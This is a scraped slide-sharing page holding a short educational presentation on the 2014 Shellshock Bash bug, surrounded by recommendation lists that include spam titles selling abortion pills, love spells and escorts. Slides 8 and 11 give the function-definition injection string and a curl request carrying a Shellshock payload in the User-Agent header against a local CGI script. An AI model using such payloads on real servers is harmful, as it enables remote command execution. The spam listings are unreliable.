Enviar pesquisa
Carregar
Shellshock bug
•
0 gostou
•
209 visualizações
R
Raashid Muhammed
Seguir
Understanding the working of Shellshock bug.
Leia menos
Leia mais
Software
Vista de apresentação de diapositivos
Denunciar
Compartilhar
Vista de apresentação de diapositivos
Denunciar
Compartilhar
1 de 12
Baixar agora
Baixar para ler offline
Recomendados
Shell Shock (Bash Bug)
Shell Shock (Bash Bug)
Kurapati Vishwak
Shellshock - A Software Bug
Shellshock - A Software Bug
vwchu
ShellShock (Software BASH Bug)
ShellShock (Software BASH Bug)
ViSolve, Inc.
Linux Virus
Linux Virus
Akhil Kadangode
The Bash Bug explained !
The Bash Bug explained !
Ahmed Banafa
The bash vulnerability practical tips to secure your environment
The bash vulnerability practical tips to secure your environment
AlienVault
Security Onion Conference - 2016
Security Onion Conference - 2016
DefensiveDepth
BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat Security Conference
Recomendados
Shell Shock (Bash Bug)
Shell Shock (Bash Bug)
Kurapati Vishwak
Shellshock - A Software Bug
Shellshock - A Software Bug
vwchu
ShellShock (Software BASH Bug)
ShellShock (Software BASH Bug)
ViSolve, Inc.
Linux Virus
Linux Virus
Akhil Kadangode
The Bash Bug explained !
The Bash Bug explained !
Ahmed Banafa
The bash vulnerability practical tips to secure your environment
The bash vulnerability practical tips to secure your environment
AlienVault
Security Onion Conference - 2016
Security Onion Conference - 2016
DefensiveDepth
BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat Security Conference
Stealthy, Hypervisor-based Malware Analysis
Stealthy, Hypervisor-based Malware Analysis
Tamas K Lengyel
Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?
HackIT Ukraine
Automating malware analysis
Automating malware analysis
Cysinfo Cyber Security Community
Basic Linux Security
Basic Linux Security
pankaj009
Intrusion Techniques
Intrusion Techniques
Festival Software Livre
Linux Network Security
Linux Network Security
Amr Ali
How to convince a malware to avoid us
How to convince a malware to avoid us
Csaba Fitzl
The SElinux Notebook :the foundations - Vol 1
The SElinux Notebook :the foundations - Vol 1
Eliel Prado
CyberSEED: Virtual Machine Introspection to Detect and Protect
CyberSEED: Virtual Machine Introspection to Detect and Protect
Tamas K Lengyel
BackTrack5 - Linux
BackTrack5 - Linux
mariuszantal
How hackers attack networks
How hackers attack networks
Adeel Javaid
How to-simulate-network-devices
How to-simulate-network-devices
Susant Sahani
Threats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in Linux
Amitesh Bharti
Backtrack
Backtrack
n|u - The Open Security Community
Introduction To Linux Security
Introduction To Linux Security
Michael Boman
Security and Linux Security
Security and Linux Security
Rizky Ariestiyansyah
SELinux Basic Usage
SELinux Basic Usage
Dmytro Minochkin
Backtrack
Backtrack
One97 Communications Limited
Defcon 29 Adversary Village: PurpleSharp - Automated Adversary Simulation
Defcon 29 Adversary Village: PurpleSharp - Automated Adversary Simulation
Mauricio Velazco
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat Security Conference
The Shellshocker
The Shellshocker
Sharath Unni
Article on shellshock
Article on shellshock
Kurapati Vishwak
Mais conteúdo relacionado
Mais procurados
Stealthy, Hypervisor-based Malware Analysis
Stealthy, Hypervisor-based Malware Analysis
Tamas K Lengyel
Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?
HackIT Ukraine
Automating malware analysis
Automating malware analysis
Cysinfo Cyber Security Community
Basic Linux Security
Basic Linux Security
pankaj009
Intrusion Techniques
Intrusion Techniques
Festival Software Livre
Linux Network Security
Linux Network Security
Amr Ali
How to convince a malware to avoid us
How to convince a malware to avoid us
Csaba Fitzl
The SElinux Notebook :the foundations - Vol 1
The SElinux Notebook :the foundations - Vol 1
Eliel Prado
CyberSEED: Virtual Machine Introspection to Detect and Protect
CyberSEED: Virtual Machine Introspection to Detect and Protect
Tamas K Lengyel
BackTrack5 - Linux
BackTrack5 - Linux
mariuszantal
How hackers attack networks
How hackers attack networks
Adeel Javaid
How to-simulate-network-devices
How to-simulate-network-devices
Susant Sahani
Threats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in Linux
Amitesh Bharti
Backtrack
Backtrack
n|u - The Open Security Community
Introduction To Linux Security
Introduction To Linux Security
Michael Boman
Security and Linux Security
Security and Linux Security
Rizky Ariestiyansyah
SELinux Basic Usage
SELinux Basic Usage
Dmytro Minochkin
Backtrack
Backtrack
One97 Communications Limited
Defcon 29 Adversary Village: PurpleSharp - Automated Adversary Simulation
Defcon 29 Adversary Village: PurpleSharp - Automated Adversary Simulation
Mauricio Velazco
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat Security Conference
Mais procurados
(20)
Stealthy, Hypervisor-based Malware Analysis
Stealthy, Hypervisor-based Malware Analysis
Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?
Automating malware analysis
Automating malware analysis
Basic Linux Security
Basic Linux Security
Intrusion Techniques
Intrusion Techniques
Linux Network Security
Linux Network Security
How to convince a malware to avoid us
How to convince a malware to avoid us
The SElinux Notebook :the foundations - Vol 1
The SElinux Notebook :the foundations - Vol 1
CyberSEED: Virtual Machine Introspection to Detect and Protect
CyberSEED: Virtual Machine Introspection to Detect and Protect
BackTrack5 - Linux
BackTrack5 - Linux
How hackers attack networks
How hackers attack networks
How to-simulate-network-devices
How to-simulate-network-devices
Threats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in Linux
Backtrack
Backtrack
Introduction To Linux Security
Introduction To Linux Security
Security and Linux Security
Security and Linux Security
SELinux Basic Usage
SELinux Basic Usage
Backtrack
Backtrack
Defcon 29 Adversary Village: PurpleSharp - Automated Adversary Simulation
Defcon 29 Adversary Village: PurpleSharp - Automated Adversary Simulation
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
Semelhante a Shellshock bug
The Shellshocker
The Shellshocker
Sharath Unni
Article on shellshock
Article on shellshock
Kurapati Vishwak
Was the cloud shell shocked
Was the cloud shell shocked
LaurenEllis
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
Andrea Draghetti
WordPress Security - Dealing With Today's Hacks
WordPress Security - Dealing With Today's Hacks
Tony Perez
OWASP App Sec US - 2010
OWASP App Sec US - 2010
Aditya K Sood
Os Cook
Os Cook
oscon2007
Security Code Review for .NET - Sherif Koussa (OWASP Ottawa)
Security Code Review for .NET - Sherif Koussa (OWASP Ottawa)
OWASP Ottawa
Computer viruses
Computer viruses
Ali Al Sarraf
Semelhante a Shellshock bug
(9)
The Shellshocker
The Shellshocker
Article on shellshock
Article on shellshock
Was the cloud shell shocked
Was the cloud shell shocked
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
WordPress Security - Dealing With Today's Hacks
WordPress Security - Dealing With Today's Hacks
OWASP App Sec US - 2010
OWASP App Sec US - 2010
Os Cook
Os Cook
Security Code Review for .NET - Sherif Koussa (OWASP Ottawa)
Security Code Review for .NET - Sherif Koussa (OWASP Ottawa)
Computer viruses
Computer viruses
Último
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
masabamasaba
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
Shane Coughlan
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
masabamasaba
SHRMPro HRMS Software Solutions Presentation
SHRMPro HRMS Software Solutions Presentation
Shrmpro
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
masabamasaba
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service provider
mohitmore19
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
masabamasaba
Define the academic and professional writing..pdf
Define the academic and professional writing..pdf
PearlKirahMaeRagusta1
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
masabamasaba
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
masabamasaba
Generic or specific? Making sensible software design decisions
Generic or specific? Making sensible software design decisions
Bert Jan Schrijver
Announcing Codolex 2.0 from GDK Software
Announcing Codolex 2.0 from GDK Software
Jim McKeeth
VTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learn
AmarnathKambale
%in Durban+277-882-255-28 abortion pills for sale in Durban
%in Durban+277-882-255-28 abortion pills for sale in Durban
masabamasaba
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
Nitya salvi
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
9953056974 Low Rate Call Girls In Saket, Delhi NCR
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
masabamasaba
10 Trends Likely to Shape Enterprise Technology in 2024
10 Trends Likely to Shape Enterprise Technology in 2024
Mind IT Systems
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
panagenda
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial Goals
Jhone kinadey
Último
(20)
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
SHRMPro HRMS Software Solutions Presentation
SHRMPro HRMS Software Solutions Presentation
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service provider
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
Define the academic and professional writing..pdf
Define the academic and professional writing..pdf
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
Generic or specific? Making sensible software design decisions
Generic or specific? Making sensible software design decisions
Announcing Codolex 2.0 from GDK Software
Announcing Codolex 2.0 from GDK Software
VTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learn
%in Durban+277-882-255-28 abortion pills for sale in Durban
%in Durban+277-882-255-28 abortion pills for sale in Durban
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
10 Trends Likely to Shape Enterprise Technology in 2024
10 Trends Likely to Shape Enterprise Technology in 2024
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial Goals
Shellshock bug
1.
Shellshock 1 / 12
2.
Shellshock Discovered on Sept, 2014. a.k.a Bashdoor Affects Bash Causes bash to unintentionally execute any shell command. National Institute of Standards & Technology warned vulnerability was 10/10 interms of serverity, impact & exploitability. 2 / 12
3.
The Shock! On 12th Sept. 2014, Bash maintainer Mr. Chet Ramey is notified of the Bug by Stephane Chazelas, an open-source enthusiast. Within hours Chazelas submits a patch fixing the bug. Precautions taken before public announcement. Public announcement on 24th Sept. 2014 On 27th Sept. 2014, Michael Zalewski from Google discovers other bash vulnerabilites and help fix them. 3 / 12
4.
"Bash"ing! Kaspersky Labs detected various DDOS attacks. Security firm Incapsula noted 17,400 attacks on more than 1,800 web domains. CloudFare tracking 1.5 million attacks per day. DDOS attacks on Akamai Technologies Scanning of systems in U.S Dept. of Defense 4 / 12
5.
Bash environment env command $ var=hello $ env $ bash var variable is not passed to the new bash instance. export command allows passing variable to the spawned child process. 5 / 12
6.
Bash function $ foo () { echo "Hello World!"; } $ foo Hello World! Bash allows passing functions as an environment variable. export -f allows passing functions to the spawned child process. Bash initializes foo as function after parsing the special variable foo. 6 / 12
7.
Alternate way to export a function Bash function can be exported as a variable $ foo='() { echo "Hello World!"; }' $ export foo $ env ... ... foo=() { echo "Hello World!"; } $ bash $ foo Hello World! 7 / 12
8.
The Bug! $ bug='() { echo "Hello World!"; }; echo "This is a Bug!"' $ export bug $ bash This is a Bug! A command concatenated after the function definition is executed during bash initialization! 8 / 12
9.
An example: CGI-based web server 9 / 12
10.
An example: CGI-based web server CGI script cat /usr/lib/cgi-bin/bashbug.sh <EOF #!/bin/bash echo “Content-type: text/html” echo “” echo “<h1> CGI Bash Bug Example </h1>” EOF 10 / 12
11.
An example: CGI-based web server Malicious user request $ curl -H ‘User-Agent: () { :;}; echo "Your system has been hacked!" > /tmp/hacker’ https://localhost/cgi- bin/bashbug.sh 11 / 12
12.
References 1. https://en.wikipedia.org/wiki/Shellshock_(software_bug)/ 2. https://mustbehero.wordpress.com/2016/03/22/shellshock-bash-bug-explained-with- examples 3.
https://blog.cloudflare.com/inside-shellshock 4. http://www.nytimes.com/2014/09/26/technology/security-experts-expect-shellshock- software-bug-to-be-significant.html 12 / 12
Baixar agora